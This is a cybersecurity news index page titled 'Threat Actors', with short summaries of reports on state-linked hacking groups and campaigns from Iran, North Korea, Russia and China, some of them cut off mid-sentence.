Threat Actors
Explore detailed profiles of cyber threat actors — from state-sponsored groups to independent hacker collectives — including their motives, methods, and operations.
-
Handala Rebounds After FBI Seizure, Exposing Iran Cyberwar Resilience
After the FBI and DOJ seized Handala-linked domains on March 20, 2026, the Iran-linked group restored its web presence within about a day. The case shows why domain takedowns disrupt visibility faster than capability.
-
North Korean Hackers Deploy StoatWaffle Malware via VS Code Projects
A North Korean threat actor, tracked as WaterPlum, is using malicious Visual Studio Code projects to distribute a new malware family called StoatWaffle. The campaign leverages a feature in VS Code to automatically execute code when a project is opened.
-
FortiGate devices exploited to steal service account credentials and breach networks
SentinelOne says attackers are abusing FortiGate appliances as entry points, extracting configuration data, harvesting service account credentials, and using that access to move deeper into victim networks.
-
UNC4899 breached crypto firm after developer AirDropped trojanized file to work device
The North Korea-linked threat actor UNC4899 is suspected of breaching a cryptocurrency organization in 2025 after a developer transferred a trojanized file to a work device, leading to a cloud compromise and the theft of millions of dollars in cryptocurrency.
-
APT28 used BEARDSHELL and COVENANT to spy on Ukrainian military personnel
ESET says the Russian state-sponsored group APT28 has used two implants called BEARDSHELL and COVENANT since April 2024 to conduct long-term surveillance of Ukrainian military personnel.
-
Fatimion Cyber Team: Inside the Iran-Linked Hacking Group Waging Cyber War Across the Middle East
A pro-Iran cyber group operating out of Iraq has quietly built one of the most persistent hacktivist operations in the Middle East. Known as the Fatimion Cyber Team (فريق فاطميون الالكتروني), this group has been carrying out DDoS attacks, website defacements, database exfiltrations, and coordinated information operations since August 2023. On March 5, 2026, the…
-
CyberStrikeAI: Chinese-Linked AI Attack Platform Compromises 600+ FortiGate Devices Across 55 Countries
An open-source AI-native offensive security tool called CyberStrikeAI, developed by a Chinese coder with ties to the Ministry of State Security, has been deployed by a Russian-speaking threat actor to compromise over 600 FortiGate appliances across 55 countries. Team Cymru tracked 21 unique servers running the platform, revealing a sharp acceleration in AI-augmented offensive cyber…
-
D-Knife Spyware: China-Linked APT Hijacks Routers for Cyber Espionage
Unveiling the D-Knife spyware campaign, a sophisticated China-linked APT operation hijacking internet routers for persistent surveillance and data exfiltration. Discover its techni
-
China-Linked UNC3886 Cyber Espionage Targets Singapore Telecom
China-linked APT UNC3886’s sophisticated cyber espionage against Singapore’s telecom sector highlights evolving nation-state threats to critical infrastructure, demanding executive
-
German Security Agencies Warn of State-Sponsored Phishing Attacks via Messenger Services
German security agencies issue a joint warning about state-sponsored phishing attacks targeting high-profile individuals via Signal and other messenger services, posing significant